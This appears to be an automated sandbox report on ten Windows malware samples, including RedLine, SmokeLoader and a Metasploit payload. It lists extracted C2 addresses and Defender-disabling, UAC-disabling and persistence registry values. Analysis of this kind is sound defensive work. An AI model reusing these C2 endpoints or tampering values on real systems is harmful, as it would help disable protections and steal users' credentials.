Overview (score 10)

Tasks (score 10 each):
static (static analysis)
022e3c30a1...66.exe: windows11_x64, windows10_x64, windows10_x64
4d27dca0a1...ef.exe: windows11_x64, windows10_x64, windows10_x64
578a3a7a2b...b3.exe: windows11_x64, windows10_x64, windows10_x64
9c4880a98c...82.exe: windows11_x64, windows10_x64, windows10_x64
a1dad4a83d...c4.exe: windows11_x64, windows10_x64, windows10_x64
acf1b7d80f...e0.exe: windows11_x64, windows10_x64, windows10_x64
cbf31d825a...d2.exe: windows11_x64, windows10_x64, windows10_x64
db76a117db...12.exe: windows11_x64, windows10_x64, windows10_x64
e2ffb8aeeb...f6.exe: windows11_x64, windows10_x64, windows10_x64
f2196668f4...cb.exe: windows11_x64, windows10_x64, windows10_x64

Resubmissions (score 10 each):
10/11/2021, 14:50 | 211110-r7nbvaeddr
08/11/2021, 16:12 | 211108-tnmmbahgaj
08/11/2021, 15:26 | 211108-svdsbaccf6
08/11/2021, 14:48 | 211108-r6lfvshdfn

Analysis
max time kernel: 704s
max time network: 1247s
platform: windows11_x64
resource: win11
submitted: 08/11/2021, 16:12
Tasks
Static task static1
Behavioral task behavioral1 | Sample 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe | Resource win11
Behavioral task behavioral2 | Sample 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe | Resource win10-en-20211014
Behavioral task behavioral3 | Sample 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe | Resource win10-de-20211014
Behavioral task behavioral4 | Sample 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | Resource win11
Behavioral task behavioral5 | Sample 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | Resource win10-en-20211014
Behavioral task behavioral6 | Sample 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | Resource win10-de-20211014
Behavioral task behavioral7 | Sample 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe | Resource win11
Behavioral task behavioral8 | Sample 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe | Resource win10-en-20211014
Behavioral task behavioral9 | Sample 578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe | Resource win10-de-20211014
Behavioral task behavioral10 | Sample 9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe | Resource win11
Behavioral task behavioral11 | Sample 9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe | Resource win10-en-20211104
Behavioral task behavioral12 | Sample 9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe | Resource win10-de-20211014
Behavioral task behavioral13 | Sample a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe | Resource win11
Behavioral task behavioral14 | Sample a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe | Resource win10-en-20211014
Behavioral task behavioral15 | Sample a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe | Resource win10-de-20211104
Behavioral task behavioral16 | Sample acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe | Resource win11
Behavioral task behavioral17 | Sample acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe | Resource win10-en-20211014
Behavioral task behavioral18 | Sample acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe | Resource win10-de-20211104
Behavioral task behavioral19 | Sample cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe | Resource win11
Behavioral task behavioral20 | Sample cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe | Resource win10-en-20211104
Behavioral task behavioral21 | Sample cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe | Resource win10-de-20211104
Behavioral task behavioral22 | Sample db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe | Resource win11
Behavioral task behavioral23 | Sample db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe | Resource win10-en-20211104
Behavioral task behavioral24 | Sample db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe | Resource win10-de-20211104
Behavioral task behavioral25 | Sample e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe | Resource win11
Behavioral task behavioral26 | Sample e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe | Resource win10-en-20211104
Behavioral task behavioral27 | Sample e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe | Resource win10-de-20211104
Behavioral task behavioral28 | Sample f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe | Resource win11
Behavioral task behavioral29 | Sample f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe | Resource win10-en-20211104
Behavioral task behavioral30 | Sample f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe | Resource win10-de-20211104
General
Target: 9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe

Malware Config
Extracted: redline | fucker2 | 135.181.129.119:4805
Extracted: redline | Chris | 194.104.136.5:46013
Extracted: metasploit | windows/single_exec
Extracted: smokeloader | 2020 | http://nalirou70.top/ | http://xacokuo80.top/
Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

Modifies WinLogon for persistence (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Local\\chromedrlver.exe," | jsc.exe

Process spawned unexpected child process (4 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6112 | 4792 | rundll32.exe | 22
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6580 | 4792 | rundll32.exe | 22
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 8600 | 4792 | rundll32.exe | 22
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 7664 | 4792 | rundll32.exe | 22

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (5 IoCs)
resource | yara_rule
behavioral10/memory/5504-310-0x0000000000000000-mapping.dmp | family_redline
behavioral10/memory/5504-311-0x0000000000400000-0x0000000000422000-memory.dmp | family_redline
behavioral10/memory/5512-314-0x0000000000400000-0x0000000000422000-memory.dmp | family_redline
behavioral10/memory/5512-313-0x0000000000000000-mapping.dmp | family_redline
behavioral10/memory/5532-327-0x0000000000000000-mapping.dmp | family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.

Suspicious use of NtCreateProcessExOtherParentProcess (42 IoCs)
description | pid | Process | procid_target
PID 2592 created 3764 | 2592 | WerFault.exe | 111
PID 4048 created 2116 | 4048 | WerFault.exe | 83
PID 5144 created 1116 | 5144 | WerFault.exe | 123
PID 5312 created 3228 | 5312 | WerFault.exe | 142
PID 4880 created 408 | 4880 | WerFault.exe | 151
PID 1304 created 2960 | 1304 | WerFault.exe | 149
PID 6828 created 5824 | 6828 | Process not Found | 260
PID 7000 created 5932 | 7000 | WerFault.exe | 379
PID 6748 created 5816 | 6748 | sc.exe | 220
PID 3472 created 5984 | 3472 | powershell.exe | 310
PID 5844 created 2432 | 5844 | RunDll32.exe | 216
PID 5848 created 6820 | 5848 | WerFault.exe | 240
PID 6020 created 1596 | 6020 | WerFault.exe | 239
PID 5568 created 6852 | 5568 | WerFault.exe | 236
PID 3472 created 6788 | 3472 | powershell.exe | 503
PID 5164 created 3036 | 5164 | Conhost.exe | 507
PID 5760 created 2536 | 5760 | WerFault.exe | 215
PID 2000 created 6892 | 2000 | WerFault.exe | 250
PID 3496 created 6608 | 3496 | WerFault.exe | 228
PID 7360 created 2200 | 7360 | WerFault.exe | 391
PID 496 created 6176 | 496 | WerFault.exe | 690
PID 1616 created 5984 | 1616 | WerFault.exe | 310
PID 3812 created 5952 | 3812 | WerFault.exe | 378
PID 3812 created 7384 | 3812 | WerFault.exe | 326
PID 5664 created 7496 | 5664 | WerFault.exe | 328
PID 5488 created 1064 | 5488 | WerFault.exe | 355
PID 6848 created 8924 | 6848 | WerFault.exe | 410
PID 736 created 5608 | 736 | WerFault.exe | 421
PID 3628 created 9128 | 3628 | WerFault.exe | 418
PID 4432 created 3404 | 4432 | WerFault.exe | 436
PID 1464 created 8036 | 1464 | WerFault.exe | 455
PID 8396 created 6420 | 8396 | Process not Found | 531
PID 6744 created 400 | 6744 | WerFault.exe | 498
PID 3036 created 2440 | 3036 | WerFault.exe | 502
PID 1616 created 2312 | 1616 | WerFault.exe | 508
PID 6904 created 9072 | 6904 | WerFault.exe | 515
PID 5464 created 8884 | 5464 | WerFault.exe | 523
PID 8688 created 8516 | 8688 | WerFault.exe | 604
PID 7684 created 8516 | 7684 | WerFault.exe | 604
PID 6860 created 8540 | 6860 | WerFault.exe | 628
PID 3300 created 2156 | 3300 | WerFault.exe | 656
PID 7676 created 6460 | 7676 | WerFault.exe | 642

Suspicious use of NtCreateUserProcessOtherParentProcess (20 IoCs)
description | pid | Process | procid_target
PID 5732 created 5660 | 5732 | svchost.exe | 181
PID 5732 created 5660 | 5732 | svchost.exe | 181
PID 5732 created 5676 | 5732 | svchost.exe | 174
PID 5732 created 5676 | 5732 | svchost.exe | 174
PID 5732 created 5560 | 5732 | svchost.exe | 272
PID 5732 created 5560 | 5732 | svchost.exe | 272
PID 5732 created 5744 | 5732 | svchost.exe | 273
PID 5732 created 5744 | 5732 | svchost.exe | 273
PID 5732 created 256 | 5732 | svchost.exe | 306
PID 5732 created 256 | 5732 | svchost.exe | 306
PID 5732 created 6896 | 5732 | svchost.exe | 562
PID 5732 created 6896 | 5732 | svchost.exe | 562
PID 5732 created 4664 | 5732 | svchost.exe | 547
PID 5732 created 4664 | 5732 | svchost.exe | 547
PID 5732 created 2144 | 5732 | svchost.exe | 548
PID 5732 created 2144 | 5732 | svchost.exe | 548
PID 5732 created 8692 | 5732 | svchost.exe | 587
PID 5732 created 8692 | 5732 | svchost.exe | 587
PID 5732 created 8112 | 5732 | svchost.exe | 588
PID 5732 created 8112 | 5732 | svchost.exe | 588
Turns off Windows Defender SpyNet reporting (2 TTPs)

Suricata alerts
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
Checks for common network interception software (1 TTPs)
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

resource | yara_rule
behavioral10/files/0x000200000001efb1-164.dat | aspack_v212_v242
behavioral10/files/0x000200000001efb1-163.dat | aspack_v212_v242
behavioral10/files/0x000200000001ef15-159.dat | aspack_v212_v242
behavioral10/files/0x000200000001ef15-160.dat | aspack_v212_v242
behavioral10/files/0x000200000001ef17-158.dat | aspack_v212_v242
behavioral10/files/0x000200000001ef17-157.dat | aspack_v212_v242

Blocklisted process makes network request (8 IoCs)
flow | pid | Process
104 | 5932 | schtasks.exe
131 | 5932 | schtasks.exe
134 | 5932 | schtasks.exe
138 | 5932 | schtasks.exe
140 | 5932 | schtasks.exe
144 | 5932 | schtasks.exe
145 | 5932 | schtasks.exe
489 | 9068 | powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory (2 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | DYbALA.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | DYbALA.exe

Executes dropped EXE (64 IoCs)
pid | Process
2972 | setup_installer.exe
2116 | setup_install.exe
3436 | Wed128c2773227671b3f.exe
3292 | Wed12fb2a5c52f05816.exe
3764 | Wed126ca6605dbec0399.exe
3832 | Wed120b6f5c6d562.exe
440 | Wed1217e6a0ef74ed.exe
1692 | Wed12bcd18bdbc441.exe
1488 | Wed120b6f5c6d562.tmp
2280 | Wed1229427acd4bc167.exe
4616 | Wed121f7e9e92793cf.exe
2996 | Wed12859e3c1cf63b6a0.exe
1116 | Wed12fbb08f1dfc28.exe
1812 | Wed129eb9b8859.exe
2348 | Wed12ebaf7883e1890d.exe
4248 | Wed120b6f5c6d562.exe
4584 | Wed1241cc206cfb.exe
5204 | Wed120b6f5c6d562.tmp
5504 | Wed128c2773227671b3f.exe
5512 | Wed121f7e9e92793cf.exe
5692 | kbTxHZeYOomBllay3dpYIR9f.exe
5532 | Wed12859e3c1cf63b6a0.exe
5752 | kbTxHZeYOomBllay3dpYIR9f.exe
5964 | VAKlCUnlQu.exe
6036 | 6736747.exe
5228 | 227470.exe
5628 | Conhost.exe
5956 | hgFUPQSfVWja4bF9va2Nco94.exe
408 | PsHhTfowuIHRylZl4gkpCI9u.exe
2960 | CUdVFaUwSqvIYDEDWI1VHn3_.exe
6004 | JoVBqle5ZuYZOmKRj95tPfGf.exe
5932 | schtasks.exe
6128 | 3601344.exe
1460 | Conhost.exe
1548 | powershell.exe
5644 | 503782.exe
5824 | WerFault.exe
5348 | Conhost.exe
3248 | SS9XSoZmzR6yTxeWosrHLE5V.exe
5592 | JoVBqle5ZuYZOmKRj95tPfGf.exe
5676 | AdvancedRun.exe
5660 | AdvancedRun.exe
1080 | 8pWB.eXE
6204 | WinHoster.exe
2148 | _WjLopI0SGjVoK1vv4RABWvT.exe
6912 | RxAPuFNW.exe
6456 | _WjLopI0SGjVoK1vv4RABWvT.exe
2432 | LtPGrXM6HcaPC22YEKYV8Nfi.exe
2536 | XjhsglKxkrcTUd6de5gbWXb0.exe
5156 | CccUqSnvorEDEpUpxK4J3YF5.exe
6820 | HZF5DVkBv1ZqBbYSSg8j3oEv.exe
5420 | ArGiap3960SUZs1dAEDT_gNj.exe
5816 | D889cNcc5Y_B8MT1CZoqotRj.exe
4264 | IjhdP4nV_bnmATIamZ0oM7vu.exe
6156 | D_BLDnDHu_TD3iz9CSGyBFPI.exe
1088 | hgFUPQSfVWja4bF9va2Nco94.exe
1596 | ImBQvx_Kr5O0lBuAItFuMM0V.exe
5984 | setup_2.exe
3824 | Q_fET_usQo2X_6EmGsXsx62w.exe
6852 | Bd4X2NxFXA5NEmJKfUAVox3h.exe
6832 | xf7rCbRH4pGRa62Ofza35vUU.exe
1288 | 7elpvTmw1vT1ONC9ndp6H4va.exe
3036 | WerFault.exe
4376 | T95LOChSK2FJnZ8sP6x6_E2w.exe
Modifies Windows Firewall (1 TTPs)

Sets service image path in registry (2 TTPs)

Stops running service(s) (3 TTPs)

Checks BIOS information in registry (2 TTPs, 20 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | MegogoSell_crypted.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Conhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | RfdHYMkUrnVfH1ZtERmjgC7e.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Conhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 227470.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | CccUqSnvorEDEpUpxK4J3YF5.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | CccUqSnvorEDEpUpxK4J3YF5.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Conhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 8588289.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Conhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Conhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | MegogoSell_crypted.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Conhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Q_fET_usQo2X_6EmGsXsx62w.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Q_fET_usQo2X_6EmGsXsx62w.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Conhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 227470.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | RfdHYMkUrnVfH1ZtERmjgC7e.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Conhost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 8588289.exe

Drops startup file (4 IoCs)
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe | hgFUPQSfVWja4bF9va2Nco94.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe | hgFUPQSfVWja4bF9va2Nco94.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe | 877E.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe | 877E.exe

Loads dropped DLL (64 IoCs)
pid | Process
2116 | setup_install.exe
2116 | setup_install.exe
2116 | setup_install.exe
2116 | setup_install.exe
2116 | setup_install.exe
1488 | Wed120b6f5c6d562.tmp
5204 | Wed120b6f5c6d562.tmp
3228 | rundll32.exe
3248 | SS9XSoZmzR6yTxeWosrHLE5V.exe
3248 | SS9XSoZmzR6yTxeWosrHLE5V.exe
3248 | SS9XSoZmzR6yTxeWosrHLE5V.exe
6760 | msiexec.exe
3248 | SS9XSoZmzR6yTxeWosrHLE5V.exe
3248 | SS9XSoZmzR6yTxeWosrHLE5V.exe
5492 | setup.exe
5492 | setup.exe
720 | rundll32.exe
720 | rundll32.exe
6060 | Conhost.exe
6972 | Conhost.exe
6972 | Conhost.exe
7872 | setup.tmp
6972 | Conhost.exe
6972 | Conhost.exe
6972 | Conhost.exe
5952 | rundll32.exe
6972 | Conhost.exe
6972 | Conhost.exe
2644 | setup.exe
2644 | setup.exe
9208 | H5g745DD4zaGI4veDHXuzIg9.exe
9208 | H5g745DD4zaGI4veDHXuzIg9.exe
8760 | msiexec.exe
8760 | msiexec.exe
2948 | Setup.exe
2948 | Setup.exe
2756 | Pr94tBJFmmmBtB5jfTVqm8MB.tmp
9208 | H5g745DD4zaGI4veDHXuzIg9.exe
9208 | H5g745DD4zaGI4veDHXuzIg9.exe
2964 | dtIpIQ_qtf_Fq6mF3YqSxzxN.exe
2964 | dtIpIQ_qtf_Fq6mF3YqSxzxN.exe
9208 | H5g745DD4zaGI4veDHXuzIg9.exe
9208 | H5g745DD4zaGI4veDHXuzIg9.exe
7940 | TyORHIs1LZXKQSe6l2yLpqNb.tmp
2964 | dtIpIQ_qtf_Fq6mF3YqSxzxN.exe
2964 | dtIpIQ_qtf_Fq6mF3YqSxzxN.exe
7108 | rundll32.exe
7108 | rundll32.exe
2964 | dtIpIQ_qtf_Fq6mF3YqSxzxN.exe
2964 | dtIpIQ_qtf_Fq6mF3YqSxzxN.exe
5360 | setup.exe
5360 | setup.exe
400 | rundll32.exe
5384 | setup.exe
5384 | setup.exe
5076 | rundll32.exe
5076 | rundll32.exe
8884 | rundll32.exe
2664 | rundll32.exe
2664 | rundll32.exe
2644 | setup.exe
2644 | setup.exe
2644 | setup.exe
2644 | setup.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\877E.exe = "0" | 877E.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Cursors\veejays\svchost.exe = "0" | 877E.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe = "0" | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe = "0" | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe = "0" | 877E.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | hgFUPQSfVWja4bF9va2Nco94.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\sememe\svchost.exe = "0" | hgFUPQSfVWja4bF9va2Nco94.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions | hgFUPQSfVWja4bF9va2Nco94.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | hgFUPQSfVWja4bF9va2Nco94.exe

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 15 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | Conhost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\hepatocyte = "C:\\Program Files\\Common Files\\System\\sememe\\svchost.exe" | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\hepatocyte = "C:\\Program Files\\Common Files\\System\\sememe\\svchost.exe" | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\scriptwriters = "C:\\Windows\\Cursors\\veejays\\svchost.exe" | 877E.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\scriptwriters = "C:\\Windows\\Cursors\\veejays\\svchost.exe" | scriptwriters.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Bududosopo.exe\"" | DYbALA.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\hepatocyte = "C:\\Program Files\\Common Files\\System\\sememe\\svchost.exe" | hepatocyte.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --bo6y9QQgnM" | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --bo6y9QQgnM" | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --bo6y9QQgnM" | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --bo6y9QQgnM" | setup.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Q_fET_usQo2X_6EmGsXsx62w.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | RfdHYMkUrnVfH1ZtERmjgC7e.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | CccUqSnvorEDEpUpxK4J3YF5.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | hepatocyte.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 877E.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | scriptwriters.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 227470.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | MegogoSell_crypted.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | hgFUPQSfVWja4bF9va2Nco94.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 8588289.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 877E.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | hgFUPQSfVWja4bF9va2Nco94.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | hgFUPQSfVWja4bF9va2Nco94.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | hepatocyte.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | scriptwriters.exe
